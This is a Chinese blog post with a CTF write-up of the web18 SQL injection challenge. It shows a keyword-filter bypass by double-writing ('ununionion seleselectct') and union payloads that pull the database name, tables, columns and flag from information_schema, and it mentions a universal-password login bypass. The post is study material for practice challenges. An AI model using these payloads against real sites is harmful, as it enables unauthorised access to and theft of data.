ctf论剑场注入题

最新推荐文章于 2022-03-08 16:18:18 发布
最新推荐文章于 2022-03-08 16:18:18 发布
阅读量262 收藏
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42812036/article/details/101031457
版权

ctf论剑场注入题

web18

先测试单引号
http://123.206.31.85:10018/list.php?id=1' 报错(指的是内容不显示 )
加上注释
http://123.206.31.85:10018/list.php?id=1'--+ 不报错
说明这样是可以注入成功的
说明这是个普通的注入
然后试着测了一下字段数

http://123.206.31.85:10018/list.php?id=1'union select 1,2,3--+ 报错
结果测试到1-10都报错
然后跑了一下
http://123.206.31.85:10018/list.php?id=1'union--+ 不报错
发现关键字被过滤
然后试了一下 发现 union、select、or都被过滤了
突破点是双写关键字绕过

爆数据库

?id=-1'ununionion seleselectct 1,database(),3--+

爆表

?id=-1'ununionion seleselectct 1,group_concat(table_name),3 from infoorrmation _schema.tables where table_schema='web18'--+

爆字段

?id=-1'ununionion seleselectct 1,group_concat(column_name),3 from infoorrmation _schema.columns where table_name='flag'--+

爆flag

?id=1 ununionion seleselectct 1,flag,3 from flag--+

结束

web4


然后- -
在这里插入图片描述
秒不可言,万能密码直接爆出flag

昂首下楼梯
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF库超详细资源合集
06-14
在传统的CTF线上⽐赛中,Web类⽬是主要的型之⼀,相较于⼆进制、逆向等类型的⽬,参赛者不需掌握系统底层知识;相较于密码学、杂项问,不需具特别强的编程能⼒,故⼊门较为容易。Web类⽬常见的漏洞类型...
记一次CTFCTF_论剑(web26)
BigRingKing的博客
05-25 252
CTF目 web_26
CTF_论剑(bugku新平台)部分目write up
城南以南花亦开
03-31 2428
CTF_论剑(bugku新平台) 部分目write up(1)头像签到0和1的故事最简单的pwnweb26web1这个人真的很高web9Snake进制转换流量分析ezsypdf 头像 使用WinHex打开图片,尝试搜索关键字“flag”,发现flag; 按照目要求,使用所找到flag的md5 32位加密值进行验证,发现flag错误; 换个方式,将所找到flag先进行base64解码,...
CTF论剑web目(持续更新)--WEB18
jiuyongpinyin的博客
07-20 486
web18 首先打开页面随便点点,发现list中像是有注入点: 所以我们进行尝试,发现是字符型注入: 我们尝试一下就基本的有没有被过滤,先尝试 or 1=1,发现没有回显,尝试了大写然后也不行,尝试双写发现成功了: 所以接下来就是使用order by 查看列: 使用联合查询,查询数据库: 发现数据库是web18,接下来查询表: payload: ?id=11' ununionion seselectlect 1,(seselectlect group_concat(table_name) fro
CTF_论剑
timesleep的博客
03-08 133
1.头像 直接拉到winhax中查找文本flag就找到了,然后base64解码,再用MD5加密32位 2.签到 直接就给出flag 3.0和1的故事 打开压缩包最后看到了一个flag{}.txt的文件 打开发现后面有空格拉到windex中 然后转成16进制提交 4.这个人真的很高 图片另存为 打开查看我们修改它的高度查看一下详细 然后我们拖进winhex修改一下高度 640的十六进制为280 499的十六进制为1f3 然后我们修改为300 然后保查看 我们看到了加密过的前半部分在找后面的
CTF_论剑 Web WriteUp(持续更新)
qq_41995976的博客
05-19 6295
文章目录web1web9流量分析web2web5web6web11web13日志审计web20 web1 利用的是变量覆盖漏洞 http://www.mamicode.com/info-detail-2314166.html payload:http://123.206.31.85:10001/?a=&c=aaaaa web9 干: 要求你PUT一串信息"bugku" 才能获得flag...
ctfCTF理论考核及答案
07-05
ctf
CTF100.docx
05-25
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符...
领航杯 CTF 2021 决赛 真 7z
12-07
领航杯 CTF 2021 决赛
CTF理论考核及答案 ctf
02-21
CTF理论考核及答案 ctf库 1.readme.txt中哪一部分是扩展名 A、readme B、readme. C、.txt D、me.txt 参考答案:C 2.关于html语言,描述错误的有 A、html语言不区分大小写 B、浏览器可以直接解释执行html代码 C...
newbugku部分web
qq_41642815的博客
04-28 2560
web1 目代码 看到extract函数,联到常见的变量覆盖漏洞 根据我以前写的文章 点击链接 可以构造$b为任意值,后面判断了a和c是否相等,可以使用伪协议来做 web11 打开目显示如下 标为robots,尝试访问robots.txt,访问后提示我们shell.php 访问shell.php 这块校验和西湖论剑的留言板目很像,爆破脚本 import hashlib def ...
论剑 web部分 writeup
qq_44657899的博客
10-25 1814
re模块: '.' 匹配所有字符串,除\n以外 ‘-’ 表示范围[0-9] '*' 匹配前面的子表达式零次或多次。要匹配 * 字符,请使用 \*。 '+' 匹配前面的子表达式一次或多次。要匹配 + 字符,请使用 \+ '^' 匹配字符串开头 ‘$’ 匹配字符串结尾 re '\' 转义字符, 使后一个字符改变原来的意思,如果字符串中有字符*需要匹配,可以\*或者字符集[*] re.findall(r...
Bugku新平台论剑writeup
a370793934的专栏
11-28 1万+
头像 用010editor打开搜索flag就是找到的flag:flag{bGxvdmV0aGVnaXJs}再经过base64解密flag{llovethegirl}后再来进行MD5加密得到 flag{8ba484e0a0e0a5ee4ffcb791385ddf25} 签到 签个到吧 flag{abcdABCD1234} 0和1的故事 解压后有flag{}.txt文件,用1...
关于JSON Web Token的攻击
qq_40223049的博客
12-10 1064
关于JSON Web Token的攻击Json Web TokenJWT的构成对JWT的相关攻击记录常用工具原理CTF记录案例记录推荐参考文章 Json Web Token Json Web Token简称JWT,是基于JSON开发标准与token鉴权机制将验证信息存放在客户端,通过请求附加验证信息向服务器请求验证并返回数据的认证方法。其对分布式站点的单点登陆有较高的效率。 JWT的构成 JWT通...
ctf论剑_misc_easypdf writeup
nonono123456的博客
09-24 1517
下载回来一个pdf文件 直接用pdf编辑器打开,发现图片下还有一个文字层,挪走图片就看到了flag,注意要改成小写。
CTF_论剑 web之 web2
silence1_的博客
05-31 1517
CTF_论剑 web之 web2 目: 进入目,一看就是要写脚本的那种2333 python脚本如下: import requests url="http://123.206.31.85:10002/" res=requests.get(url) cookies=res.cookies["PHPSESSID"] #获得session t...
CTF论剑Web1
nzw1134864657的博客
11-18 286
目http://123.206.31.85:3032/L3yx.php
CTF web总结
热门推荐
giantbranch的专栏
04-09 7万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/50959166 本文根据自己的做经验及各大练习平台不断更新,若我最近懒了,没怎么更新,请在下面提醒我或鼓励我 仅作为自己的笔记及刚入门的童鞋,大牛勿喷 基础篇   1.直接查看源代码   http:/...
CTF_论剑-web26
Ch_an_ger的博客
09-21 811
首先打开目链接是一个代码审计, 咱把代码拉出来加些注释 这样看起来就很明了了,我们只需要在num传入数字str传入字符串就能得到flag
CTFsql注入练习
最新发布
07-29
回答: CTFsql注入练习是一种用于训练和测试SQL注入技巧的目。在这些目中,参与者需要通过注入恶意的SQL代码来绕过应用程序的安全机制,从而获取敏感信息或者执行未授权的操作。这些目通常包含了不同的注入景和技巧,例如基于时间的盲注、报错注入、布尔盲注、宽字节注入等等。参与者需要通过分析应用程序的行为和结构,构造合适的注入语句来实现攻击目标。在解决这些目的过程中,参与者可以提高对SQL注入漏洞的理解和掌握,并学习如何防范和修复这类漏洞。 #### 引用[.reference_title] - *1* *2* [CTF-SQL注入入门型](https://blog.csdn.net/weixin_43080961/article/details/121939366)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [i 春秋 CTF训练营 web——SQL注入 1(字符型注入)(手动注入)](https://blog.csdn.net/AAAAAAAAAAAA66/article/details/121626527)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值